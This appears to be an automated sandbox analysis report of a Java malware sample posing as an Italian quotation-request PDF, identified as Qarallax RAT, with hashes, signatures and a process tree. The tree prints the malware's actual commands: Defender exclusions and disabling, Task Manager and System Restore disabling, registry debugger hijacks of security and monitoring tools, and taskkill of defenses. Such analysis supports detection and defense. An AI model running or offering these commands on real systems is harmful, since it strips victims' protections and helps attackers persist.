Analysis

  • max time kernel
    74s
  • max time network
    92s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    19-08-2020 08:10

General

  • Target

    BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar

  • Size

    411KB

  • MD5

    10d957699927f69e41cf596817c4ca7b

  • SHA1

    dad3d0a7a5cc52c7ef981ab2cc73de64d41c3561

  • SHA256

    826f301f5f248d9586c0924a30c56cbb9cda42b82292a1ddd35b0b5ae087413c

  • SHA512

    2149a85b712ae88c180353d71dccd1aed9d57c41407c679f070362396914233f3575d00d7394f370201e12e4db7b06f01c0f0a63e223af9f933dc0af53d9e243

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • QarallaxRAT

    Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).

  • Qarallax RAT support DLL 1 IoCs
  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 100 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 228 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\Windows\system32\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Windows\system32\cmd.exe
      cmd.exe
      2⤵
        PID:1524
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1684
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1768
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1404
      • C:\Windows\system32\attrib.exe
        attrib +h C:\Users\Admin\Oracle
        2⤵
        • Views/modifies file attributes
        PID:1880
      • C:\Windows\system32\attrib.exe
        attrib +h +r +s C:\Users\Admin\.ntusernt.ini
        2⤵
        • Views/modifies file attributes
        PID:1896
      • C:\Windows\system32\attrib.exe
        attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1908
      • C:\Windows\system32\attrib.exe
        attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1844
      • C:\Windows\system32\attrib.exe
        attrib -s -r C:\Users\Admin\ujTBR
        2⤵
        • Views/modifies file attributes
        PID:1824
      • C:\Windows\system32\attrib.exe
        attrib +s +r C:\Users\Admin\ujTBR
        2⤵
        • Views/modifies file attributes
        PID:1832
      • C:\Windows\system32\attrib.exe
        attrib +h C:\Users\Admin\ujTBR
        2⤵
        • Views/modifies file attributes
        PID:524
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
        2⤵
        • Views/modifies file attributes
        PID:664
      • C:\Windows\system32\cmd.exe
        cmd.exe
        2⤵
          PID:1628
          • C:\Windows\system32\reg.exe
            reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
            3⤵
              PID:564
            • C:\Windows\system32\reg.exe
              reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
              3⤵
                PID:1876
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1564
            • C:\Windows\System32\taskkill.exe
              "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
              2⤵
              • Kills process with taskkill
              PID:1020
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
              2⤵
                PID:1544
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                2⤵
                  PID:1960
                • C:\Windows\System32\reg.exe
                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
                  2⤵
                    PID:1936
                  • C:\Windows\System32\reg.exe
                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
                    2⤵
                      PID:2036
                    • C:\Windows\System32\reg.exe
                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                      2⤵
                        PID:2020
                      • C:\Windows\System32\reg.exe
                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
                        2⤵
                          PID:1076
                        • C:\Windows\System32\reg.exe
                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                          2⤵
                            PID:1140
                          • C:\Windows\System32\reg.exe
                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                            2⤵
                              PID:1480
                            • C:\Windows\System32\reg.exe
                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                              2⤵
                                PID:1552
                              • C:\Windows\System32\reg.exe
                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                2⤵
                                  PID:1684
                                • C:\Windows\System32\reg.exe
                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                                  2⤵
                                    PID:1400
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe
                                    2⤵
                                      PID:1836
                                      • C:\Windows\system32\reg.exe
                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
                                        3⤵
                                          PID:1952
                                        • C:\Windows\system32\reg.exe
                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
                                          3⤵
                                            PID:1508
                                        • C:\Windows\System32\taskkill.exe
                                          "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
                                          2⤵
                                          • Kills process with taskkill
                                          PID:528
                                        • C:\Windows\System32\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
                                          2⤵
                                            PID:1640
                                          • C:\Windows\System32\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                            2⤵
                                              PID:1572
                                            • C:\Windows\System32\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                              2⤵
                                                PID:2004
                                              • C:\Windows\System32\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:2044
                                                • C:\Windows\System32\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                  2⤵
                                                    PID:1544
                                                  • C:\Windows\System32\reg.exe
                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:1668
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:1036
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                        2⤵
                                                          PID:1756
                                                        • C:\Windows\System32\taskkill.exe
                                                          "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
                                                          2⤵
                                                          • Kills process with taskkill
                                                          PID:1356
                                                        • C:\Windows\System32\reg.exe
                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:1832
                                                          • C:\Windows\System32\reg.exe
                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                            2⤵
                                                              PID:1896
                                                            • C:\Windows\System32\reg.exe
                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:1816
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd.exe
                                                                2⤵
                                                                  PID:1552
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
                                                                    3⤵
                                                                      PID:1612
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
                                                                      3⤵
                                                                        PID:1892
                                                                    • C:\Windows\System32\reg.exe
                                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                      2⤵
                                                                        PID:1424
                                                                      • C:\Windows\System32\taskkill.exe
                                                                        "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                        2⤵
                                                                        • Kills process with taskkill
                                                                        PID:332
                                                                      • C:\Windows\system32\cmd.exe
                                                                        cmd.exe
                                                                        2⤵
                                                                          PID:1348
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
                                                                            3⤵
                                                                              PID:2004
                                                                          • C:\Windows\System32\taskkill.exe
                                                                            "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
                                                                            2⤵
                                                                            • Kills process with taskkill
                                                                            PID:1764
                                                                          • C:\Windows\System32\reg.exe
                                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                            2⤵
                                                                              PID:840
                                                                            • C:\Windows\System32\taskkill.exe
                                                                              "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
                                                                              2⤵
                                                                              • Kills process with taskkill
                                                                              PID:1768
                                                                            • C:\Windows\System32\reg.exe
                                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                              2⤵
                                                                                PID:2020
                                                                              • C:\Windows\System32\reg.exe
                                                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                2⤵
                                                                                  PID:1908
                                                                                • C:\Windows\System32\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                  2⤵
                                                                                    PID:1620
                                                                                  • C:\Windows\System32\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                    2⤵
                                                                                      PID:1832
                                                                                    • C:\Windows\System32\reg.exe
                                                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                      2⤵
                                                                                        PID:1464
                                                                                      • C:\Windows\System32\reg.exe
                                                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                        2⤵
                                                                                          PID:872
                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                          "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
                                                                                          2⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:1484
                                                                                        • C:\Windows\System32\reg.exe
                                                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                          2⤵
                                                                                            PID:1524
                                                                                          • C:\Windows\System32\reg.exe
                                                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                            2⤵
                                                                                              PID:2028
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:1400
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:1624
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:1544
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:1804
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2080
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2124
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2148
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2180
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2232
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2284
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2316
                                                                                            • C:\Windows\System32\taskkill.exe
                                                                                              "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
                                                                                              2⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:2344

                                                                                          Network

                                                                                          MITRE ATT&CK Enterprise v6

                                                                                          Replay Monitor

                                                                                          Loading Replay Monitor...

                                                                                          Downloads

                                                                                          • C:\Users\Admin\.ntusernt.ini

                                                                                          • C:\Users\Admin\ujTBR\Desktop.ini

                                                                                          • C:\Users\Admin\ujTBR\NXtxm.class

                                                                                          • \Users\Admin\AppData\Local\Temp\ZyBsZNVTqU7478620462767460328.xml

                                                                                          • memory/332-55-0x0000000000000000-mapping.dmp

                                                                                          • memory/524-15-0x0000000000000000-mapping.dmp

                                                                                          • memory/528-36-0x0000000000000000-mapping.dmp

                                                                                          • memory/564-28-0x0000000000000000-mapping.dmp

                                                                                          • memory/664-16-0x0000000000000000-mapping.dmp

                                                                                          • memory/840-59-0x0000000000000000-mapping.dmp

                                                                                          • memory/872-66-0x0000000000000000-mapping.dmp

                                                                                          • memory/1020-20-0x0000000000000000-mapping.dmp

                                                                                          • memory/1036-46-0x0000000000000000-mapping.dmp

                                                                                          • memory/1076-26-0x0000000000000000-mapping.dmp

                                                                                          • memory/1140-27-0x0000000000000000-mapping.dmp

                                                                                          • memory/1348-56-0x0000000000000000-mapping.dmp

                                                                                          • memory/1356-47-0x0000000000000000-mapping.dmp

                                                                                          • memory/1400-33-0x0000000000000000-mapping.dmp

                                                                                          • memory/1400-72-0x0000000000000000-mapping.dmp

                                                                                          • memory/1404-5-0x0000000000000000-mapping.dmp

                                                                                          • memory/1424-52-0x0000000000000000-mapping.dmp

                                                                                          • memory/1464-65-0x0000000000000000-mapping.dmp

                                                                                          • memory/1480-29-0x0000000000000000-mapping.dmp

                                                                                          • memory/1484-67-0x0000000000000000-mapping.dmp

                                                                                          • memory/1504-2-0x0000000000000000-mapping.dmp

                                                                                          • memory/1508-43-0x0000000000000000-mapping.dmp

                                                                                          • memory/1524-68-0x0000000000000000-mapping.dmp

                                                                                          • memory/1524-1-0x0000000000000000-mapping.dmp

                                                                                          • memory/1544-75-0x0000000000000000-mapping.dmp

                                                                                          • memory/1544-21-0x0000000000000000-mapping.dmp

                                                                                          • memory/1544-42-0x0000000000000000-mapping.dmp

                                                                                          • memory/1552-30-0x0000000000000000-mapping.dmp

                                                                                          • memory/1552-51-0x0000000000000000-mapping.dmp

                                                                                          • memory/1564-85-0x00000000026C0000-0x00000000026C1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1564-76-0x0000000001E90000-0x0000000001E91000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1564-73-0x00000000024D0000-0x00000000024D1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1564-71-0x000000001ABE0000-0x000000001ABE1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1564-69-0x0000000002020000-0x0000000002021000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1564-81-0x0000000002690000-0x0000000002691000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1564-99-0x0000000002930000-0x0000000002931000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1564-100-0x00000000029C0000-0x00000000029C1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1564-31-0x000007FEF5F20000-0x000007FEF690C000-memory.dmp

                                                                                            Filesize

                                                                                            9.9MB

                                                                                          • memory/1564-19-0x0000000000000000-mapping.dmp

                                                                                          • memory/1572-38-0x0000000000000000-mapping.dmp

                                                                                          • memory/1612-53-0x0000000000000000-mapping.dmp

                                                                                          • memory/1620-63-0x0000000000000000-mapping.dmp

                                                                                          • memory/1624-74-0x0000000000000000-mapping.dmp

                                                                                          • memory/1628-18-0x0000000000000000-mapping.dmp

                                                                                          • memory/1640-37-0x0000000000000000-mapping.dmp

                                                                                          • memory/1668-44-0x0000000000000000-mapping.dmp

                                                                                          • memory/1684-3-0x0000000000000000-mapping.dmp

                                                                                          • memory/1684-32-0x0000000000000000-mapping.dmp

                                                                                          • memory/1756-45-0x0000000000000000-mapping.dmp

                                                                                          • memory/1764-57-0x0000000000000000-mapping.dmp

                                                                                          • memory/1768-60-0x0000000000000000-mapping.dmp

                                                                                          • memory/1768-4-0x0000000000000000-mapping.dmp

                                                                                          • memory/1804-77-0x0000000000000000-mapping.dmp

                                                                                          • memory/1816-50-0x0000000000000000-mapping.dmp

                                                                                          • memory/1824-12-0x0000000000000000-mapping.dmp

                                                                                          • memory/1832-14-0x0000000000000000-mapping.dmp

                                                                                          • memory/1832-48-0x0000000000000000-mapping.dmp

                                                                                          • memory/1832-64-0x0000000000000000-mapping.dmp

                                                                                          • memory/1836-35-0x0000000000000000-mapping.dmp

                                                                                          • memory/1844-11-0x0000000000000000-mapping.dmp

                                                                                          • memory/1876-34-0x0000000000000000-mapping.dmp

                                                                                          • memory/1880-6-0x0000000000000000-mapping.dmp

                                                                                          • memory/1892-54-0x0000000000000000-mapping.dmp

                                                                                          • memory/1896-8-0x0000000000000000-mapping.dmp

                                                                                          • memory/1896-49-0x0000000000000000-mapping.dmp

                                                                                          • memory/1908-10-0x0000000000000000-mapping.dmp

                                                                                          • memory/1908-62-0x0000000000000000-mapping.dmp

                                                                                          • memory/1936-23-0x0000000000000000-mapping.dmp

                                                                                          • memory/1952-39-0x0000000000000000-mapping.dmp

                                                                                          • memory/1960-22-0x0000000000000000-mapping.dmp

                                                                                          • memory/2004-58-0x0000000000000000-mapping.dmp

                                                                                          • memory/2004-40-0x0000000000000000-mapping.dmp

                                                                                          • memory/2020-61-0x0000000000000000-mapping.dmp

                                                                                          • memory/2020-25-0x0000000000000000-mapping.dmp

                                                                                          • memory/2028-70-0x0000000000000000-mapping.dmp

                                                                                          • memory/2036-24-0x0000000000000000-mapping.dmp

                                                                                          • memory/2044-41-0x0000000000000000-mapping.dmp

                                                                                          • memory/2080-78-0x0000000000000000-mapping.dmp

                                                                                          • memory/2124-79-0x0000000000000000-mapping.dmp

                                                                                          • memory/2148-80-0x0000000000000000-mapping.dmp

                                                                                          • memory/2180-82-0x0000000000000000-mapping.dmp

                                                                                          • memory/2232-90-0x0000000000000000-mapping.dmp

                                                                                          • memory/2284-98-0x0000000000000000-mapping.dmp

                                                                                          • memory/2316-101-0x0000000000000000-mapping.dmp

                                                                                          • memory/2344-102-0x0000000000000000-mapping.dmp